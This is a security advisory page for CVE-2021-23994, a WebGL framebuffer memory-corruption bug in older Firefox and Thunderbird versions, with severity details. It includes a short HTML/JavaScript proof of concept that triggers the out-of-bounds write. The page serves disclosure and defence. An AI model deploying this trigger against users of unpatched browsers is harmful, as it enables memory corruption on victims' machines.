Back to Security Advisories

CVE-2021-23994

HIGH Severity

A WebGL framebuffer was not initialized early enough, resulting in memory corruption and an out of bound write. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88.

 Proof of Concept 
<!DOCTYPE html>
<body>
<canvas id="canvas3" width="1024" height="1024"></canvas>

<script>
var canvas = document.getElementById('canvas3');
var gl3 = canvas3.getContext('webgl2', {  alpha:false, antialias:false } );
var fBuffer3 = gl3.createFramebuffer();
gl3.bindFramebuffer(gl3.DRAW_FRAMEBUFFER, fBuffer3);
var fBuffer4 = gl3.createFramebuffer();
gl3.bindFramebuffer(gl3.READ_FRAMEBUFFER, fBuffer4);
var rBuffer3 = gl3.createRenderbuffer();
gl3.bindRenderbuffer( gl3.RENDERBUFFER, rBuffer3 );
gl3.framebufferRenderbuffer( gl3.READ_FRAMEBUFFER, gl3.COLOR_ATTACHMENT0, gl3.RENDERBUFFER, rBuffer3 );
gl3.deleteFramebuffer(fBuffer4);
gl3.drawBuffers([gl3.COLOR_ATTACHMENT0]);
</script>

</body>
</html>

Risk Information

CVE ID
CVE-2021-23994

Vendor
Mozilla

Product
Firefox

CVSS SCORE
8.8

Advisories
Vendor Advisory
NVD


1-8-309, Ronald Ross Road, Begumpet, Hyderabad Telangana, India – 500003

Talk to an Expert

Let’s engage in a strategic discussion on adding value to your organizations security. For prompt action, bypass the wait—connect with us directly. Your objectives, our priority.

+91​ ​9100 909 110
+91​ ​9100 909 110

Quick Links

Web Application Penetration Testing
Mobile Application Penetration Testing
Red Team Assessment
Social Engineering Assessment




©2024 Krash Consulting, All rights reserved